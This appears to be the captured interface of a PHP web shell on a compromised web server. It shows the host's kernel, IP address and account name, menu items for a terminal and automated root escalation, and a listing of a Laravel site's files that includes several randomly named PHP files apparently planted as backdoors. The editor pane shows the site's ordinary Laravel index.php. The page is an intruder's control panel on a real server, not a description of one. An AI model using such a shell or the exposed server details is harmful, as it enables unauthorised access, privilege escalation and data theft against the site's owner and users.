Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
dailyprofit.return /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-08-31 19:08
DB
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
Documentation
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
app
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
bootstrap
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
cgi-bin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
config
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
database
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
files
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
images
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
modules
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
resources
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
routes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
storage
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
tests
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
vendor
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.env
1.31
KB
-rw-r--r--
2025-09-02 18:51
.env.server
1.11
KB
-rw-r--r--
2023-07-31 15:30
.gitattributes
190
B
-rw-r--r--
2022-11-18 15:02
.gitignore
239
B
-rw-r--r--
2023-07-25 13:22
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
32NcYboy.php
445
B
-rw-r--r--
2026-02-22 23:14
CuxOB4Rg.php
445
B
-rw-r--r--
2026-02-23 13:08
Hyipe rio_2.zip
56.84
MB
-rw-r--r--
2025-08-31 18:23
README.md
3.95
KB
-rw-r--r--
2022-11-18 15:02
artisan
1.7
KB
-rw-r--r--
2022-11-18 15:02
composer.json
3.09
KB
-rw-r--r--
2023-07-29 00:05
composer.lock
429.47
KB
-rw-r--r--
2023-07-31 00:09
error_log
4.15
MB
-rw-r--r--
2026-02-23 14:25
index.html
44.04
KB
-rw-r--r--
2023-08-04 22:32
index.php
1.72
KB
-rw-r--r--
2023-07-25 23:21
package-lock.json
407.36
KB
-rw-r--r--
2023-07-25 13:22
package.json
568
B
-rw-r--r--
2023-07-25 13:22
phpunit.xml
1.18
KB
-rw-r--r--
2022-11-18 15:02
pint.json
132
B
-rw-r--r--
2023-07-25 23:21
postcss.config.js
101
B
-rw-r--r--
2022-11-18 15:02
tailwind.config.js
551
B
-rw-r--r--
2022-11-18 15:02
txets.php
4.37
KB
-rw-r--r--
2026-02-24 02:50
vite.config.js
322
B
-rw-r--r--
2022-11-18 15:02
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php use Illuminate\Contracts\Http\Kernel; use Illuminate\Http\Request; define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Check If The Application Is Under Maintenance |-------------------------------------------------------------------------- | | If the application is in maintenance / demo mode via the "down" command | we will load this file so that any pre-rendered content can be shown | instead of starting the framework, which could cause an exception. | */ if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) { require $maintenance; } /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | this application. We just need to utilize it! We'll simply require it | into the script here so we don't need to manually load our classes. | */ require __DIR__.'/vendor/autoload.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request using | the application's HTTP kernel. Then, we will send the response back | to this client's browser, allowing them to enjoy our application. | */ $app = require_once __DIR__.'/bootstrap/app.php'; $kernel = $app->make(Kernel::class); $response = $kernel->handle( $request = Request::capture() )->send(); $kernel->terminate($request, $response);